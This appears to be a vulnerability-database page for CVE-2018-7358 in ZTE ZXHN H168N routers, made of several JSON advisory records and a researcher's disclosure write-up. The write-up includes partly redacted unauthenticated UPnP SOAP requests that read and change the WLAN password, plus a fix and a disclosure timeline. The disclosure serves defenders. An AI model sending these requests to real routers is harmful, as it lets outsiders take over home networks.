cvelistv5 - CVE-2018-7358

CVE-2018-7358 (GCVE-0-2018-7358)

Vulnerability from cvelistv5

Published

2018-11-14 15:00

Modified

2024-08-05 06:24

Severity ?

6.5 (Medium) - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

Improper Authorization

Summary

References

URL

Tags

psirt@zte.com.cn	http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523	Vendor Advisory
psirt@zte.com.cn	http://www.securityfocus.com/bid/105963	Third Party Advisory, VDB Entry
psirt@zte.com.cn	https://www.exploit-db.com/exploits/45972/	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/105963	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/45972/	Exploit, Third Party Advisory, VDB Entry

Impacted products

	Vendor	Product	Version
	ZTE	ZXHN H168N	Version: V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T06:24:11.858Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "105963",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/105963"
          },
          {
            "name": "45972",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/45972/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ZXHN H168N",
          "vendor": "ZTE",
          "versions": [
            {
              "status": "affected",
              "version": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
            }
          ]
        }
      ],
      "datePublic": "2018-11-14T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Improper Authorization\n",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-12-12T10:57:01",
        "orgId": "6786b568-6808-4982-b61f-398b0d9679eb",
        "shortName": "zte"
      },
      "references": [
        {
          "name": "105963",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/105963"
        },
        {
          "name": "45972",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/45972/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@zte.com.cn",
          "ID": "CVE-2018-7358",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "ZXHN H168N",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "ZTE"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Improper Authorization\n"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "105963",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/105963"
            },
            {
              "name": "45972",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/45972/"
            },
            {
              "name": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523",
              "refsource": "CONFIRM",
              "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
            }
          ]
        },
        "source": {
          "discovery": "UNKNOWN"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "6786b568-6808-4982-b61f-398b0d9679eb",
    "assignerShortName": "zte",
    "cveId": "CVE-2018-7358",
    "datePublished": "2018-11-14T15:00:00",
    "dateReserved": "2018-02-22T00:00:00",
    "dateUpdated": "2024-08-05T06:24:11.858Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2018-7358\",\"sourceIdentifier\":\"psirt@zte.com.cn\",\"published\":\"2018-11-14T15:29:02.220\",\"lastModified\":\"2024-11-21T04:12:03.917\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations.\"},{\"lang\":\"es\",\"value\":\"El producto ZTE ZXHN H168N en versiones V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 y V2.2.0_PK11T tiene una vulnerabilidad de control de cambios incorrecto, que podr\u00eda permitir que un usuario no autorizado realice acciones no autorizadas.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"psirt@zte.com.cn\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"ADJACENT_NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"ADJACENT_NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:A/AC:L/Au:N/C:P/I:P/A:P\",\"baseScore\":5.8,\"accessVector\":\"ADJACENT_NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":6.5,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-287\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk1.2t2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E3076346-6FE4-4B31-AB9E-5C2D8325C5A9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk1.2t5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"26C8A530-ECCC-4B66-84A5-F656113DA5A4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk11t:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CD09C0CB-482C-4777-B2A4-98FA0F327511\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk11t7:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"AE5DF287-E1D0-47F1-8F1D-842DF1D00019\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:zte:zxhn_h168n:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"391EB61C-0A7B-48A6-8BBD-944C848ACD10\"}]}]}],\"references\":[{\"url\":\"http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523\",\"source\":\"psirt@zte.com.cn\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://www.securityfocus.com/bid/105963\",\"source\":\"psirt@zte.com.cn\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.exploit-db.com/exploits/45972/\",\"source\":\"psirt@zte.com.cn\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://www.securityfocus.com/bid/105963\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.exploit-db.com/exploits/45972/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]}]}}"
  }
}

gsd-2018-7358

Vulnerability from gsd

Modified

2023-12-13 01:22

Details

Aliases

CVE-2018-7358

Aliases

CVE-2018-7358

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2018-7358",
    "description": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations.",
    "id": "GSD-2018-7358",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2018-7358"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2018-7358"
      ],
      "details": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations.",
      "id": "GSD-2018-7358",
      "modified": "2023-12-13T01:22:32.589245Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "psirt@zte.com.cn",
        "ID": "CVE-2018-7358",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "ZXHN H168N",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "ZTE"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations."
          }
        ]
      },
      "impact": {
        "cvss": {
          "attackComplexity": "LOW",
          "attackVector": "ADJACENT_NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "Improper Authorization\n"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "105963",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/105963"
          },
          {
            "name": "45972",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/45972/"
          },
          {
            "name": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523",
            "refsource": "CONFIRM",
            "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
          }
        ]
      },
      "source": {
        "discovery": "UNKNOWN"
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk1.2t2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk11t7:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk11t:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk1.2t5:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zte:zxhn_h168n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@zte.com.cn",
          "ID": "CVE-2018-7358"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-287"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523",
              "refsource": "CONFIRM",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
            },
            {
              "name": "105963",
              "refsource": "BID",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://www.securityfocus.com/bid/105963"
            },
            {
              "name": "45972",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://www.exploit-db.com/exploits/45972/"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.8,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 6.5,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2019-10-09T23:42Z",
      "publishedDate": "2018-11-14T15:29Z"
    }
  }
}

ghsa-v355-59px-vmmr

Vulnerability from github

Published

2022-05-13 01:31

Modified

2022-05-13 01:31

Severity ?

8.8 (High) - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2018-7358"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-11-14T15:29:00Z",
    "severity": "HIGH"
  },
  "details": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations.",
  "id": "GHSA-v355-59px-vmmr",
  "modified": "2022-05-13T01:31:54Z",
  "published": "2022-05-13T01:31:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-7358"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/45972"
    },
    {
      "type": "WEB",
      "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/105963"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations. ZTE ZXHN H168N The product contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZTE ZXHN H168N is prone to an authorization-bypass vulnerability. ZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is China's ZTE Corporation ( ZTE ) company’s a wireless VDSL router. ZTE ZXHN H168N There are security holes in . The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5 Version, V2.2.0_PK1.2T2 Version, V2.2.0_PK11T7 Version, V2.2.0_PK11T Version. [*] POC: (CVE-2018-7357 and CVE-2018-7358)

Disclaimer: [This POC is for Educational Purposes , I would Not be

responsible for any misuse of the information mentioned in this blog post]

[+] Unauthenticated

[+] Author: Usman Saeed (usman [at] xc0re.net)

[+] Protocol: UPnP

[+] Affected Harware/Software:

Model name: ZXHN H168N v2.2

Build Timestamp: 20171127193202

Software Version: V2.2.0_PK1.2T5

[+] Findings:

Unauthenticated access to WLAN password:

POST /control/igd/wlanc_1_1 HTTP/1.1

Host: :52869

User-Agent: {omitted}

Content-Length: 288

Connection: close

Content-Type: text/xml; charset="utf-8"

SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" 1

Unauthenticated WLAN passphrase change:

POST /control/igd/wlanc_1_1 HTTP/1.1

Host: :52869

User-Agent: {omitted}

Content-Length: 496

Connection: close

Content-Type: text/xml; charset="utf-8"

SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"

{omitted}{omitted}{omitted}{omitted}{omitted}{omitted}

[*] Solution:

UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.

[*] Note:

There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.

[+] Responsible Disclosure:

Vulnerabilities identified - 20 August, 2018

Reported to ZTE - 28 August, 2018

ZTE official statement - 17 September 2018

ZTE patched the vulnerability - 12 November 2018

The operator pushed the update - 12 November 2018

CVE published - CVE- 2018-7357 and CVE-2018-7358

Public disclosure - 12 November 2018

Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201811-0984",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "zxhn h168n",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "zte",
        "version": "2.2.0_pk1.2t2"
      },
      {
        "model": "zxhn h168n",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "zte",
        "version": "2.2.0_pk1.2t5"
      },
      {
        "model": "zxhn h168n",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "zte",
        "version": "2.2.0_pk11t"
      },
      {
        "model": "zxhn h168n",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "zte",
        "version": "2.2.0_pk11t7"
      },
      {
        "model": "zxhn h168n 2.2.0 pk11t7",
        "scope": null,
        "trust": 0.3,
        "vendor": "zte",
        "version": null
      },
      {
        "model": "zxhn h168n 2.2.0 pk11t",
        "scope": null,
        "trust": 0.3,
        "vendor": "zte",
        "version": null
      },
      {
        "model": "zxhn h168n 2.2.0 pk1.2t5",
        "scope": null,
        "trust": 0.3,
        "vendor": "zte",
        "version": null
      },
      {
        "model": "zxhn h168n 2.2.0 pk1.2t2",
        "scope": null,
        "trust": 0.3,
        "vendor": "zte",
        "version": null
      },
      {
        "model": "zxhn h168n 2.2.0 pk1.2t6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "zte",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "105963"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-012683"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201811-445"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-7358"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:zte:zxhn_h168n_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-012683"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Usman Saeed",
    "sources": [
      {
        "db": "BID",
        "id": "105963"
      },
      {
        "db": "PACKETSTORM",
        "id": "150728"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2018-7358",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 6.5,
            "id": "CVE-2018-7358",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 6.5,
            "id": "VHN-137390",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:A/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "id": "CVE-2018-7358",
            "impactScore": 5.9,
